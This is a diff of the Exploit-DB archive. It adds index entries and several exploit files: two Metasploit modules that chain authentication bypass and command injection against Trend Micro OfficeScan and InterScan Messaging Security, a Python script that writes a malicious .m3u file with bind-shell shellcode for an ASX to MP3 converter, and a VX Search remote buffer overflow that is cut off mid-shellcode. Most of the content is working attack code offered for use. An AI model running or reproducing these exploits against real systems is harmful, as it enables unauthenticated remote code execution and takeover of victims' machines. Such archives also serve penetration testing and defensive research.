42105,platforms/multiple/webapps/42105.html,"WebKit - CachedFrame does not Detach Openers Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
42106,platforms/multiple/webapps/42106.html,"WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
42107,platforms/multiple/webapps/42107.html,"WebKit - 'Document::prepareForDestruction' and 'CachedFrame' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
42107,platforms/multiple/webapps/42107.html,"WebKit - 'Document::prepareForDestruction' / 'CachedFrame' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
42111,platforms/json/webapps/42111.txt,"Sungard eTRAKiT3 <= 3.2.1.17 - SQL Injection",2017-06-02,"Goran Tuzovic",json,webapps,0
42113,platforms/php/webapps/42113.txt,"Joomla! Component Payage 2.05 - 'aid' Parameter SQL Injection",2017-06-03,"Persian Hack Team",php,webapps,0
42114,platforms/hardware/webapps/42114.py,"EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution",2017-06-04,LiquidWorm,hardware,webapps,0
@ -38401,7 +38404,7 @@ id,file,description,date,author,platform,type,port
42359,platforms/php/webapps/42359.txt,"PaulShop - SQL Injection / Cross-Site Scripting",2017-07-24,"BTIS Team",php,webapps,0
42371,platforms/json/webapps/42371.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Remote Command Execution",2017-07-24,"RedTeam Pentesting",json,webapps,0
42372,platforms/json/webapps/42372.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure",2017-07-24,"RedTeam Pentesting",json,webapps,0
42378,platforms/multiple/webapps/42378.html,"WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting",2017-07-25,"Google Security Research",multiple,webapps,0
42378,platforms/multiple/webapps/42378.html,"WebKit JSC - 'JSObject::putInlineSlow' / 'JSValue::putToPrimitive' Universal Cross-Site Scripting",2017-07-25,"Google Security Research",multiple,webapps,0
42379,platforms/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps,0
42380,platforms/php/webapps/42380.txt,"Wordpress Plugin Ads Pro <= 3.4 - Cross-Site Scripting / SQL Injection",2017-07-25,8bitsec,php,webapps,0
42383,platforms/php/webapps/42383.html,"Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)",2017-07-26,shinnai,php,webapps,0
@ -38667,3 +38670,5 @@ id,file,description,date,author,platform,type,port
42966,platforms/jsp/webapps/42966.py,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution",2017-10-09,intx0x80,jsp,webapps,0
42967,platforms/php/webapps/42967.txt,"ClipShare 7.0 - SQL Injection",2017-10-09,8bitsec,php,webapps,0
42968,platforms/php/webapps/42968.txt,"Complain Management System - Hard-Coded Credentials / Blind SQL injection",2017-10-10,havysec,php,webapps,0
42971,platforms/php/webapps/42971.rb,"Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",php,webapps,0
42972,platforms/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",php,webapps,0

Can't render this file because it is too large.

View file

@ -2,7 +2,7 @@ Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - SQL Injection
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14758
CVE: CVE-2017-14757
Affected Software:
==================

View file

@ -2,7 +2,7 @@ Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - SQL Injection
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14757
CVE: CVE-2017-14758
Affected Software:
==================

112
platforms/linux/dos/42970.txt Executable file
View file

@ -0,0 +1,112 @@
Source: https://blogs.gentoo.org/ago/2017/09/26/binutils-heap-based-buffer-overflow-in-read_1_byte-dwarf2-c/
Description:
binutils is a set of tools necessary to build programs.
The complete ASan output of the issue:
# nm -A -a -l -S -s --special-syms --synthetic --with-symbol-versions -D $FILE
==3235==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x613000000512 at pc 0x7f7c93ae3c88 bp 0x7ffe38d7a970 sp 0x7ffe38d7a968
READ of size 1 at 0x613000000512 thread T0
#0 0x7f7c93ae3c87 in read_1_byte /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:616:10
#1 0x7f7c93ae3c87 in decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:2311
#2 0x7f7c93aee92b in comp_unit_maybe_decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3608:26
#3 0x7f7c93aee92b in comp_unit_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3643
#4 0x7f7c93aeb94f in _bfd_dwarf2_find_nearest_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:4755:11
#5 0x7f7c93a2920b in _bfd_elf_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/elf.c:8694:10
#6 0x517c83 in print_symbol /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1003:9
#7 0x51542d in print_symbols /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1084:7
#8 0x51542d in display_rel_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1200
#9 0x510f56 in display_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1318:7
#10 0x50faae in main /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1792:12
#11 0x7f7c9296e680 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.23-r4/work/glibc-2.23/csu/../csu/libc-start.c:289
#12 0x41ac18 in _init (/usr/x86_64-pc-linux-gnu/binutils-bin/git/nm+0x41ac18)
0x613000000512 is located 0 bytes to the right of 338-byte region [0x6130000003c0,0x613000000512)
allocated by thread T0 here:
#0 0x4d8e08 in malloc /var/tmp/portage/sys-libs/compiler-rt-sanitizers-5.0.0/work/compiler-rt-5.0.0.src/lib/asan/asan_malloc_linux.cc:67
#1 0x7f7c9393a37c in bfd_malloc /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/libbfd.c:193:9
#2 0x7f7c9392fb2f in bfd_get_full_section_contents /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/compress.c:248:21
#3 0x7f7c939696d3 in bfd_simple_get_relocated_section_contents /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/simple.c:193:12
#4 0x7f7c93ade26e in read_section /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:556:8
#5 0x7f7c93adef3c in decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:2047:9
#6 0x7f7c93aee92b in comp_unit_maybe_decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3608:26
#7 0x7f7c93aee92b in comp_unit_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3643
#8 0x7f7c93aeb94f in _bfd_dwarf2_find_nearest_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:4755:11
#9 0x7f7c93a2920b in _bfd_elf_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/elf.c:8694:10
#10 0x517c83 in print_symbol /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1003:9
#11 0x51542d in print_symbols /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1084:7
#12 0x51542d in display_rel_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1200
#13 0x510f56 in display_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1318:7
#14 0x50faae in main /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1792:12
#15 0x7f7c9296e680 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.23-r4/work/glibc-2.23/csu/../csu/libc-start.c:289
SUMMARY: AddressSanitizer: heap-buffer-overflow /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:616:10 in read_1_byte
Shadow bytes around the buggy address:
0x0c267fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c267fff8060: 00 00 00 00 00 00 00 00 00 00 00 04 fa fa fa fa
0x0c267fff8070: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c267fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c267fff8090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c267fff80a0: 00 00[02]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==3235==ABORTING
Affected version:
2.29.51.20170921 and maybe past releases
Fixed version:
N/A
Commit fix:
https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=515f23e63c0074ab531bc954f84ca40c6281a724
Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.
CVE:
CVE-2017-14939
Reproducer:
https://github.com/asarubbo/poc/blob/master/00370-binutils-heapoverflow-read_1_byte
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42970.zip
Timeline:
2017-09-21: bug discovered and reported to upstream
2017-09-24: upstream released a patch
2017-09-26: blog post about the issue
2017-09-29: CVE assigned
Note:
This bug was found with American Fuzzy Lop.
This bug was identified with bare metal servers donated by Packet. This work is also supported by the Core Infrastructure Initiative.
Permalink:
https://blogs.gentoo.org/ago/2017/09/26/binutils-heap-based-buffer-overflow-in-read_1_byte-dwarf2-c/
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42970.zip

216
platforms/php/webapps/42971.rb Executable file
View file

@ -0,0 +1,216 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => "Trend Micro OfficeScan Remote Code Execution",
'Description' => %q{
This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a
terminal command under the context of the web server user.
The specific flaw exists within the management interface, which listens on TCP port 443 by default. The Trend Micro Officescan product
has a widget feature which is implemented with PHP. Talker.php takes ack and hash parameters but doesn't validate these values, which
leads to an authentication bypass for the widget. Proxy.php files under the mod TMCSS folder take multiple parameters but the process
does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities,
unauthenticated users can execute a terminal command under the context of the web server user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me <mr_me@offensive-security.com>', # author of command injection
'Mehmet Ince <mehmet@mehmetince.net>' # author of authentication bypass & msf module
],
'References' =>
[
['URL', 'https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-17-521/'],
],
'DefaultOptions' =>
{
'SSL' => true,
'RPORT' => 443
},
'Platform' => ['win'],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Targets' =>
[
['Automatic Targeting', { 'auto' => true }],
['OfficeScan 11', {}],
['OfficeScan XG', {}],
],
'Privileged' => false,
'DisclosureDate' => "Oct 7 2017",
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the Trend Micro OfficeScan management interface', '/'])
]
)
end
def build_csrftoken(my_target, phpsessid=nil)
vprint_status("Building csrftoken")
if my_target.name == 'OfficeScan XG'
csrf_token = Rex::Text.md5(Time.now.to_s)
else
csrf_token = phpsessid.scan(/PHPSESSID=([a-zA-Z0-9]+)/).flatten[0]
end
csrf_token
end
def auto_target
#XG version of the widget library has package.json within the same directory.
mytarget = target
if target['auto'] && target.name =~ /Automatic/
print_status('Automatic targeting enabled. Trying to detect version.')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'package.json'),
})
if res && res.code == 200
mytarget = targets[2]
elsif res && res.code == 404
mytarget = targets[1]
else
fail_with(Failure::Unknown, 'Unable to automatically select a target')
end
print_status("Selected target system : #{mytarget.name}")
end
mytarget
end
def auth(my_target)
# Version XG performs MD5 validation on wf_CSRF_token parameter. We can't simply use PHPSESSID directly because it contains a-zA-Z0-9.
# Beside that, version 11 use PHPSESSID value as a csrf token. Thus, we are manually crafting the cookie.
if my_target.name == 'OfficeScan XG'
csrf_token = build_csrftoken(my_target)
cookie = "LANG=en_US; LogonUser=root; userID=1; wf_CSRF_token=#{csrf_token}"
# Version 11 want to see valid PHPSESSID from beginning to the end. For this reason we need to force backend to initiate one for us.
else
vprint_status("Sending session initiation request for : #{my_target.name}.")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'index.php'),
})
cookie = "LANG=en_US; LogonUser=root; userID=1; #{res.get_cookies}"
csrf_token = build_csrftoken(my_target, res.get_cookies)
end
# Okay, we dynamically generated a cookie and csrf_token values depends on OfficeScan version.
# Now we need to exploit authentication bypass vulnerability.
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'ui', 'modLogin', 'talker.php'),
'headers' => {
'X-CSRFToken' => csrf_token,
'ctype' => 'application/x-www-form-urlencoded; charset=utf-8'
},
'cookie' => cookie,
'vars_post' => {
'cid' => '1',
'act' => 'check',
'hash' => Rex::Text.rand_text_alpha(10),
'pid' => '1'
}
})
if res && res.code == 200 && res.body.include?('login successfully')
# Another business logic in here.
# Version 11 want to use same PHPSESSID generated at the beginning by hitting index.php
# Version XG want to use newly created PHPSESSID that comes from auth bypass response.
if my_target.name == 'OfficeScan XG'
res.get_cookies
else
cookie
end
else
nil
end
end
def check
my_target = auto_target
token = auth(my_target)
# If we dont have a cookie that means authentication bypass issue has been patched on target system.
if token.nil?
Exploit::CheckCode::Safe
else
# Authentication bypass does not mean that we have a command injection.
# Accessing to the widget framework without having command injection means literally nothing.
# So we gonna trigger command injection vulnerability without a payload.
csrf_token = build_csrftoken(my_target, token)
vprint_status('Trying to detect command injection vulnerability')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'proxy_controller.php'),
'headers' => {
'X-CSRFToken' => csrf_token,
'ctype' => 'application/x-www-form-urlencoded; charset=utf-8'
},
'cookie' => "LANG=en_US; LogonUser=root; wf_CSRF_token=#{csrf_token}; #{token}",
'vars_post' => {
'module' => 'modTMCSS',
'serverid' => '1',
'TOP' => ''
}
})
if res && res.code == 200 && res.body.include?('Proxy execution failed: exec report.php failed')
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
end
def exploit
mytarget = auto_target
print_status('Exploiting authentication bypass')
cookie = auth(mytarget)
if cookie.nil?
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
else
print_good("Authenticated successfully bypassed.")
end
print_status('Generating payload')
powershell_options = {
encode_final_payload: true,
remove_comspec: true
}
p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)
# We need to craft csrf value for version 11 again like we did before at auth function.
csrf_token = build_csrftoken(mytarget, cookie)
print_status('Trigerring command injection vulnerability')
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'proxy_controller.php'),
'headers' => {
'X-CSRFToken' => csrf_token,
'ctype' => 'application/x-www-form-urlencoded; charset=utf-8'
},
'cookie' => "LANG=en_US; LogonUser=root; wf_CSRF_token=#{csrf_token}; #{cookie}",
'vars_post' => {
'module' => 'modTMCSS',
'serverid' => '1',
'TOP' => "2>&1||#{p}"
}
})
end
end

130
platforms/php/webapps/42972.rb Executable file
View file

@ -0,0 +1,130 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution",
'Description' => %q{
This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a
terminal command under the context of the web server user.
The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product
have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which
leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process
does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities,
unauthenticated users can execute a terminal command under the context of the web server user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me <mr_me@offensive-security.com>', # author of command injection
'Mehmet Ince <mehmet@mehmetince.net>' # author of authentication bypass & msf module
],
'References' =>
[
['URL', 'https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-17-521/'],
],
'DefaultOptions' =>
{
'SSL' => true,
'RPORT' => 8445
},
'Payload' =>
{
'Compat' =>
{
'ConnectionType' => '-bind'
},
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' => [[ 'Automatic', {}]],
'Privileged' => false,
'DisclosureDate' => "Oct 7 2017",
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the Trend Micro IMSVA management interface', '/'])
]
)
end
def extract_jsessionid
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'widget', 'repository', 'log', 'diagnostic.log')
})
if res && res.code == 200 && res.body.include?('JSEEEIONID')
res.body.scan(/JSEEEIONID:([A-F0-9]{32})/).flatten.last
else
nil
end
end
def widget_auth(jsessionid)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'widget', 'index.php'),
'cookie' => "CurrentLocale=en-U=en_US; JSESSIONID=#{jsessionid}"
})
if res && res.code == 200 && res.body.include?('USER_GENERATED_WIDGET_DIR')
res.get_cookies
else
nil
end
end
def check
# If we've managed to bypass authentication, that means target is most likely vulnerable.
jsessionid = extract_jsessionid
if jsessionid.nil?
return Exploit::CheckCode::Safe
end
auth = widget_auth(jsessionid)
if auth.nil?
Exploit::CheckCode::Safe
else
Exploit::CheckCode::Appears
end
end
def exploit
print_status('Extracting JSESSIONID from publicly accessible log file')
jsessionid = extract_jsessionid
if jsessionid.nil?
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
else
print_good("Awesome. JSESSIONID value = #{jsessionid}")
end
print_status('Initiating session with widget framework')
cookies = widget_auth(jsessionid)
if cookies.nil?
fail_with(Failure::NoAccess, "Latest JSESSIONID is expired. Wait for sysadmin to login IMSVA")
else
print_good('Session with widget framework successfully initiated.')
end
print_status('Trigerring command injection vulnerability')
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'widget', 'proxy_controller.php'),
'cookie' => "CurrentLocale=en-US; LogonUser=root; JSESSIONID=#{jsessionid}; #{cookies}",
'vars_post' => {
'module' => 'modTMCSS',
'serverid' => '1',
'TOP' => "$(python -c \"#{payload.encoded}\")"
}
})
end
end

View file

@ -0,0 +1,85 @@
# Exploit Title: Buffer Overflow via crafted malicious .m3u file
# Exploit Author: Parichay Rai
# Tested on: XP Service Pack 3
# CVE : CVE-2017-15221
Description
------------
A buffer overflow Attack possible due to improper input mechanism
Proof of Concept
----------------
#!/usr/bin/python
#This exploit generates a malicious playlist for the asx to mp3 converter 3.1.3.7.2010.
#This is an exploit that work well against a windows XP3 systems!
#Successful exploit gives you a bind shell on 4444
BadChar= "\x00\x0a\x0d\x20"
# Payload Generation Command: msfpayload windows/shell_bind_tcp EXITFUNC=none R | msfencode -a x86 -b "\x00\x0a\x0d\x20" -f c
# Successful exploitation opens port 4444 on the victim Machine
shellcode=("\xd9\xee\xbf\xad\x07\x92\x3e\xd9\x74\x24\xf4\x5e\x2b\xc9" +
"\xb1\x56\x31\x7e\x18\x03\x7e\x18\x83\xc6\xa9\xe5\x67\xc2" +
"\x59\x60\x87\x3b\x99\x13\x01\xde\xa8\x01\x75\xaa\x98\x95" +
"\xfd\xfe\x10\x5d\x53\xeb\xa3\x13\x7c\x1c\x04\x99\x5a\x13" +
"\x95\x2f\x63\xff\x55\x31\x1f\x02\x89\x91\x1e\xcd\xdc\xd0" +
"\x67\x30\x2e\x80\x30\x3e\x9c\x35\x34\x02\x1c\x37\x9a\x08" +
"\x1c\x4f\x9f\xcf\xe8\xe5\x9e\x1f\x40\x71\xe8\x87\xeb\xdd" +
"\xc9\xb6\x38\x3e\x35\xf0\x35\xf5\xcd\x03\x9f\xc7\x2e\x32" +
"\xdf\x84\x10\xfa\xd2\xd5\x55\x3d\x0c\xa0\xad\x3d\xb1\xb3" +
"\x75\x3f\x6d\x31\x68\xe7\xe6\xe1\x48\x19\x2b\x77\x1a\x15" +
"\x80\xf3\x44\x3a\x17\xd7\xfe\x46\x9c\xd6\xd0\xce\xe6\xfc" +
"\xf4\x8b\xbd\x9d\xad\x71\x10\xa1\xae\xde\xcd\x07\xa4\xcd" +
"\x1a\x31\xe7\x99\xef\x0c\x18\x5a\x67\x06\x6b\x68\x28\xbc" +
"\xe3\xc0\xa1\x1a\xf3\x27\x98\xdb\x6b\xd6\x22\x1c\xa5\x1d" +
"\x76\x4c\xdd\xb4\xf6\x07\x1d\x38\x23\x87\x4d\x96\x9b\x68" +
"\x3e\x56\x4b\x01\x54\x59\xb4\x31\x57\xb3\xc3\x75\x99\xe7" +
"\x80\x11\xd8\x17\x37\xbe\x55\xf1\x5d\x2e\x30\xa9\xc9\x8c" +
"\x67\x62\x6e\xee\x4d\xde\x27\x78\xd9\x08\xff\x87\xda\x1e" +
"\xac\x24\x72\xc9\x26\x27\x47\xe8\x39\x62\xef\x63\x02\xe5" +
"\x65\x1a\xc1\x97\x7a\x37\xb1\x34\xe8\xdc\x41\x32\x11\x4b" +
"\x16\x13\xe7\x82\xf2\x89\x5e\x3d\xe0\x53\x06\x06\xa0\x8f" +
"\xfb\x89\x29\x5d\x47\xae\x39\x9b\x48\xea\x6d\x73\x1f\xa4" +
"\xdb\x35\xc9\x06\xb5\xef\xa6\xc0\x51\x69\x85\xd2\x27\x76" +
"\xc0\xa4\xc7\xc7\xbd\xf0\xf8\xe8\x29\xf5\x81\x14\xca\xfa" +
"\x58\x9d\xa0\xc0\x80\xbf\xdc\x6c\xd1\xfd\x80\x8e\x0c\xc1" +
"\xbc\x0c\xa4\xba\x3a\x0c\xcd\xbf\x07\x8a\x3e\xb2\x18\x7f" +
"\x40\x61\x18\xaa")
buffer="http://"
buffer+="A"*17417
buffer+="\x53\x93\x42\x7e" #(overwrites EIP in windows XP service pack 3 with the address of user32.dll)
buffer+="\x90"*10 #NOPs
buffer+=shellcode
buffer+="\x90"*10 #NOPs
f=open("exploit.m3u","w")
f.write(buffer);
f.close()
----------------------
Affected Targets
---------------------
ASX to MP3 version 3.1.3.7 and May be less
Solution
---------------
Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing "junk" characters, etc.
Credits
----------
Offensive Security
Rebellious Ceaser

103
platforms/windows/remote/42973.py Executable file
View file

@ -0,0 +1,103 @@
#!/usr/bin/env python
# Exploit Title : VX Search Enterprise v10.1.12 Remote Buffer Overflow
# Exploit Author : Revnic Vasile
# Email : revnic[at]gmail[dot]com
# Date : 09-10-2017
# Vendor Homepage : http://www.flexense.com/
# Software Link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.1.12.exe
# Version : 10.1.12
# Tested on : Windows 7 x86 Pro SP1
# Category : Windows Remote Exploit
# CVE : CVE-2017-15220
import socket
import os
import sys
import struct
# msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUN=none -e x86/alpha_mixed -f c
shellcode = ("\x89\xe5\xdb\xd3\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x39\x6c\x68\x68\x6f\x72\x55\x50\x77\x70\x53\x30\x43\x50\x4d"
"\x59\x79\x75\x66\x51\x69\x50\x45\x34\x6c\x4b\x32\x70\x70\x30"
"\x4c\x4b\x32\x72\x64\x4c\x6e\x6b\x56\x32\x66\x74\x6e\x6b\x72"
"\x52\x75\x78\x36\x6f\x4e\x57\x33\x7a\x57\x56\x54\x71\x4b\x4f"
"\x4e\x4c\x65\x6c\x65\x31\x73\x4c\x44\x42\x56\x4c\x75\x70\x5a"
"\x61\x38\x4f\x36\x6d\x63\x31\x4f\x37\x5a\x42\x58\x72\x63\x62"
"\x70\x57\x6e\x6b\x42\x72\x44\x50\x4c\x4b\x73\x7a\x45\x6c\x6e"
"\x6b\x72\x6c\x44\x51\x72\x58\x78\x63\x33\x78\x35\x51\x48\x51"
"\x42\x71\x6c\x4b\x43\x69\x37\x50\x77\x71\x5a\x73\x4c\x4b\x67"
"\x39\x77\x68\x5a\x43\x66\x5a\x53\x79\x4e\x6b\x74\x74\x4c\x4b"
"\x43\x31\x39\x46\x70\x31\x6b\x4f\x6e\x4c\x39\x51\x78\x4f\x46"
"\x6d\x53\x31\x38\x47\x55\x68\x39\x70\x72\x55\x7a\x56\x33\x33"
"\x33\x4d\x4b\x48\x35\x6b\x61\x6d\x74\x64\x50\x75\x4a\x44\x31"
"\x48\x4c\x4b\x46\x38\x56\x44\x73\x31\x69\x43\x50\x66\x4c\x4b"
"\x46\x6c\x72\x6b\x4c\x4b\x73\x68\x67\x6c\x43\x31\x4b\x63\x4c"
"\x4b\x46\x64\x4e\x6b\x76\x61\x48\x50\x4c\x49\x71\x54\x34\x64"
"\x35\x74\x63\x6b\x71\x4b\x71\x71\x36\x39\x31\x4a\x46\x31\x39"
"\x6f\x6d\x30\x43\x6f\x73\x6f\x32\x7a\x6e\x6b\x74\x52\x68\x6b"
"\x6c\x4d\x43\x6d\x62\x48\x44\x73\x44\x72\x77\x70\x65\x50\x33"
"\x58\x73\x47\x30\x73\x56\x52\x43\x6f\x31\x44\x61\x78\x62\x6c"
"\x53\x47\x74\x66\x35\x57\x59\x6f\x4a\x75\x6f\x48\x4e\x70\x45"
"\x51\x47\x70\x57\x70\x65\x79\x6f\x34\x71\x44\x62\x70\x43\x58"
"\x46\x49\x4f\x70\x30\x6b\x53\x30\x59\x6f\x6a\x75\x72\x4a\x33"
"\x38\x53\x69\x46\x30\x4b\x52\x69\x6d\x73\x70\x32\x70\x51\x50"
"\x32\x70\x31\x78\x4a\x4a\x36\x6f\x49\x4f\x4b\x50\x39\x6f\x49"
"\x45\x4e\x77\x31\x78\x75\x52\x75\x50\x57\x61\x53\x6c\x6b\x39"
"\x7a\x46\x63\x5a\x54\x50\x71\x46\x32\x77\x43\x58\x6b\x72\x49"
"\x4b\x76\x57\x53\x57\x39\x6f\x38\x55\x46\x37\x42\x48\x38\x37"
"\x48\x69\x57\x48\x49\x6f\x59\x6f\x58\x55\x73\x67\x75\x38\x44"
"\x34\x68\x6c\x57\x4b\x69\x71\x59\x6f\x7a\x75\x51\x47\x6e\x77"
"\x50\x68\x50\x75\x72\x4e\x52\x6d\x51\x71\x6b\x4f\x4a\x75\x31"
"\x78\x52\x43\x70\x6d\x52\x44\x67\x70\x4f\x79\x78\x63\x71\x47"
"\x43\x67\x33\x67\x75\x61\x68\x76\x62\x4a\x55\x42\x70\x59\x56"
"\x36\x7a\x42\x59\x6d\x53\x56\x38\x47\x32\x64\x61\x34\x45\x6c"
"\x76\x61\x35\x51\x6c\x4d\x57\x34\x34\x64\x74\x50\x6b\x76\x43"
"\x30\x50\x44\x30\x54\x52\x70\x50\x56\x53\x66\x53\x66\x42\x66"
"\x46\x36\x70\x4e\x30\x56\x53\x66\x72\x73\x30\x56\x31\x78\x33"
"\x49\x38\x4c\x65\x6f\x4d\x56\x4b\x4f\x59\x45\x4b\x39\x79\x70"
"\x32\x6e\x73\x66\x33\x76\x6b\x4f\x30\x30\x31\x78\x65\x58\x6f"
"\x77\x67\x6d\x31\x70\x79\x6f\x38\x55\x6d\x6b\x6a\x50\x4e\x55"
